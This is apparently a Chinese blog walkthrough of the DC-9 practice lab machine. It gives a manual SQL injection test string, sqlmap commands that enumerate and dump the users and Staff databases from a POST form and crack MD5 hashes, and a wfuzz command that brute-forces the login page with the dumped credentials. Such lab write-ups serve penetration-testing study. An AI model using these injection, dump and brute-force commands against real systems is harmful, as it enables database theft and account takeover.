SQLMAP系列强化

案例1:DC-9

图1:

  1. 尝试 ‘ or 1=1 --+        //判断存在注入
  2. kali中使用sqlmap工具跑就完了

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"    //同样先判断是否存在sql注入

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"  --dbs     //查看所有的库,发现Staff库,Users库

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"  --current-db    //查看当前连接的数据库,发现为Staff库

判断先通过Users库入手

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"  -D users --tables   //查询User库中存在的表,发现UserDetails表

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"  -D users  -T UserDetails --dump   //查询表中数据,发现大量用户及密码的表格

将表中用户名密码复制到notepad++,按ALT键复制用户名密码每列的数据到notepad并使用替换空格去掉空格保存为pass-dict,user-dict字典

使用fuzz爆破——通过上述两个字典

wfuzz -z file,user-dict -z file,pass-dict --hw 87 "http://192.168.142.139/manage.php?username=FUZZ&password=FUZ2Z"

结果未成功,只能通过staff表下手

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"  -D Staff --tables   //查询Staff 库中存在的表,发现user表

sqlmap -u "http://192.168.178.135/results.php" --data "search=1"  -D Staff -T user --dump   //查询表中数据,发现密码并按Y进行MD5解密.

从而得到图2的用户名密码

图2:

 

其他相关参看:1、sqlmap命令详解 - tooltime - 博客园 (cnblogs.com)

2、针对POST型表单注入时sqlmap验证的三种参数_看我的眼色行事的博客-CSDN博客_sqlmap 表单       //--data -r  --forms

posted @ 2022-08-17 22:03  boomohg  阅读(114)  评论(0)    收藏  举报